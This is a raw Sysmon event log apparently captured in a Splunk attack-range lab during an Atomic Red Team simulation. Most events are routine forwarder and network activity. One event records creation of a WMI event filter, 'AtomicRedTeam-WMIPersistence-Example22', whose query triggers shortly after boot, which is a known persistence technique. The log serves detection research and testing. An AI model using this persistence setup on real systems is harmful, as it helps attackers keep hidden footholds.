Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC2E8D02125563B51584C5FCDF1B4721,SHA256=1B5EE45BFD4C3EC0C5DC21E58F21E21963824A1A5ABEE3AE7643ABE5DA0B4C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151806Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:27.662{39BD8DE3-24EC-60CA-7703-00000000D101}3656WIN-HOST-14\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\session.xmlMD5=D998B95CFC2E79ED24C7CC7AA8CDCC04,SHA256=472D5B3747D8018F59A4950FD5FE1A62FDBD892B9A66B2773A33C212674B14A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151805Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:27.113{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3ABEA5591BF897843A4CBE8180079DC5,SHA256=A05D31885F7413E07B981D5936A97843C29DAEB32322F0CB99209CB7BCD8ACD9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105180Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:28.745{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13E7D36C2E04232E186A2F5A3124C3A1,SHA256=4E37D7B5ED16C8A994F0FA0D92DF130D60F7D38ED48001BBCDF649BAB239021F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151807Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:28.131{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65B04AEB54C3C13D3CE048A809374C83,SHA256=D13B2CE2366D0E502FD048EC8BF5CF1D9CBF5957910F88672604B507B7F10123,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151811Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:27.897{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58421-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151810Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:29.145{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E982F16C37A113A2C5ED19A0635CC76,SHA256=941FFBFACD3A9E3B3E118717BEE7278C0BCA3EB417FF6E01BDBC53B33114E099,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151809Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:29.092{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=449FC82F1C2077C915EFABE30A3AB7C1,SHA256=54BFCBFEFF1E635106B0B60434C1DE09A877AD360EB54F637286BC74B82F328D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151808Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:29.092{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D81A815AFEBF090583C4923246CBBA8C,SHA256=24999DD599F13B63DB20AD2407D35CE005C9C40A81386B4D65305FB08275F0D1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105183Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:28.759{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55440-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000105182Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:30.111{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8468097498C30364E49137891B0A3115,SHA256=5AE9536422BF64F79DF203A9371D4BF44999FF3D7AB0AB024250EB8EF0ADF23B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105181Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:30.109{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=72DF34105EF1D3EAFC2A9D7D172F1E78,SHA256=E37B86BFD7244D86B0865730CECC2B6E75257A4AD815C5FE4428F8392FA2AE3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151812Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:30.159{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83C031E3EC1565D78A870F003A1EEFB6,SHA256=99FC6E8FB3C917A9EF001F3B9B57C143A848A62B27574EED41558DBADCFA3D5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105184Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:31.794{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F568D7ECE810E5E1797A66134A32C7E5,SHA256=C4DC19A026F7FF7BB079A37CF8553061146E7AE26C92A202A4A473DBD475966D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151813Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:31.174{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7BA7A299F2ECAD1E62672432791E9ECE,SHA256=B6FA9AC0D312C4E9B908708BADA626C70A835000D9634ABF454CB49AD0C972BA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151814Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:32.180{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C618A72D235404B470E0EF947E6D82C,SHA256=FF8712389A315DF35EB6621D2EEB6331F19E7AE4E317011EF4EDE70926F59BAB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105185Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:33.613{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9347F519C14257B5B9060D45235552E4,SHA256=BA73E42B1E0A510813F034E44016261F656574AEF76BEE97BB8EDB93D0A84675,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151815Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:33.195{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B41399533A9880C43E4265C24A11F7AC,SHA256=3E230D9EC53F0CACEEC99104EFA650E97D3F7B95779365668089D93969C2E54D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151820Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:33.015{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58422-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151819Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:34.663{39BD8DE3-24EC-60CA-7703-00000000D101}3656WIN-HOST-14\AdministratorC:\Program Files\Notepad++\notepad++.exeC:\Users\Administrator\AppData\Roaming\Notepad++\backup\new 1@2021-06-16_214727MD5=0929528BA6F4460DBAA025882DA7DD00,SHA256=AB4D9D00193483CD47DE0277A390661426F74401D966E487B9DC1425E26CA078,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151818Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:34.216{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75DEBC3B8DEB72C9145D0D0AB11555C7,SHA256=A8AE468D399C924744950FCE8779A60BBFFC96AD36413C303266825800B51DA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151817Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:34.216{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B77754561CE5C265B02763BC1FF21959,SHA256=DC4CB173544CA47A989ED9B67BD0146ABEB0925E3A23129161F1E6A811DD32C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151816Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:34.215{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=449FC82F1C2077C915EFABE30A3AB7C1,SHA256=54BFCBFEFF1E635106B0B60434C1DE09A877AD360EB54F637286BC74B82F328D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105186Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:35.007{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79969FF5175AD29FE32A641E9E3ADBFD,SHA256=50F285702437B0B396DFDA5C9B38DA9F7357F173759B178AF19AD4F04DFC9D23,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000151827Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:35.331{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883996C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+1728d|C:\Windows\System32\SHELL32.dll+61c70|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151826Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:35.331{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883996C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8D03-00000000D101}1960C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151825Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:35.331{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151824Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:35.331{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151823Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:35.331{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000151822Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:35.331{39BD8DE3-0FD9-60CA-8B00-00000000D101}19883004C:\Windows\Explorer.EXE{39BD8DE3-25AB-60CA-8E03-00000000D101}5300C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000151821Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:35.231{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FD63954006735895CC63CB60292738A,SHA256=43362D5C5A7063FCE6A79F1C75878E55092359F0F85F8C7A44B9AFDFFBFCB4C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105187Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:36.376{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A86A8BDACEE049C2CB31E2FE4BB413E,SHA256=7BD9389ADED7587094EFAF8A7871386598EA8307028EF0185A4066D30E2DBF5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151828Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:36.246{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF5CDCB90A44C8ED07948B21DA335592,SHA256=343E15B4534EF30753A8B5F06B11C0B558B8A427008D80ECDDD5A34A81B0E58B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105189Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:37.739{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=313360C73A7DB7338E4F4DDAD1DA32BB,SHA256=E382EFC89A6D96F223B95ABA032690E9B591891776BEF70EB1C793DD4C1DC390,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105188Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:34.711{54715871-FD33-60C9-6D00-00000000CF01}3756C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-681.attackrange.local55441-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 19341900x8000000000000000151831Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-WmiFilterEvent2021-06-16 21:47:37.961CreatedWIN-HOST-14\Administrator "root\\CimV2" "AtomicRedTeam-WMIPersistence-Example22" "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325" 23542300x8000000000000000151830Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:37.761{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=AB463C15BB704B03F71CA2DBE316C829,SHA256=BEE15A08955BFC21900093C9B5213FC3CBD4F9C40824403E3E7C82AA56C7CB0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151829Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:37.261{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D248832A19CC485348AE432A21074DF9,SHA256=0DCD4B48D6523E934597ECFEAA602C51BAA1BE832F0DAF4C7FDA016B1421278B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000105191Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:36.245{54715871-FD16-60C9-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55442-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 354300x8000000000000000105190Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:36.245{54715871-FD28-60C9-2600-00000000CF01}2840C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-681.attackrange.local55442-true0:0:0:0:0:0:0:1win-dc-681.attackrange.local389ldap 23542300x8000000000000000151832Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:38.272{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3E5CA1A40875536BC1AA09B6741BF315,SHA256=0D2F2EADA079D355919F36A1CF8F19326AC9A8D4A1CC2A675A3CD6864E88F9EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105192Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:39.100{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00BA8CDDA24848F44DC14DBBF7A35466,SHA256=3E30E103169CDE004F6AF4CAA2A03B09C80EFAF7FBED3758D025843BCB0BFB5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151834Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:39.286{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=539FA66A8D16904C10EC06B5859D4BF9,SHA256=552AA2DDBB396C99F7EA78E69194535D5ACB06D922AC77F28366A497FDE496FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151833Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:39.124{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F95F54BF6EA154869DCD8F257271C445,SHA256=60760F83F6E492C4BDCE08C18C2FFF5013E09824119BFF8756BD8444DA4F2F7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105193Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:40.477{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7DF134CD449EBBD1F286F774145630C,SHA256=3316E1279E1DF25AB79BE0503A052C8D1BDD114660BBB54B666FD94BA68417B7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000151838Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:38.890{39BD8DE3-4818-60CA-2408-00000000D101}4064C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-14.attackrange.local58423-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000151837Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:40.321{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=766CA8618F4E3981C42451F215C4A19E,SHA256=D4996E0794D3AED71F7C6C585F47346B03C1D7797229EAC898F7D7D1A6192CD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151836Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:40.086{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=679AFE5E8D643C098E8922C04648DBD6,SHA256=5F44F6E0A51592A446D7FDE2136C2B97E55CF52E8C9A0539B2722F6E6ED4A210,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000151835Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:47:40.086{39BD8DE3-481E-60CA-2D08-00000000D101}5140NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B77754561CE5C265B02763BC1FF21959,SHA256=DC4CB173544CA47A989ED9B67BD0146ABEB0925E3A23129161F1E6A811DD32C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105195Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:41.844{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C435A30767C0DA4546CF34882E09F58,SHA256=F27129CB9C909151038CC82796CFB66E32CADE094E15AFB17037B72B63AB6BE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000105194Microsoft-Windows-Sysmon/Operationalwin-dc-681.attackrange.local-2021-06-16 21:47:41.159{54715871-FD3A-60C9-7600-00000000CF01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC9453378A698A3887D747BF59800E9E,SHA256=2BECDDF61CA35574AD324ED56A455B1D5F308FA4B46161C71D1997D84F3D007D,IMPHASH=00000000000000000000000000000000falsetrue 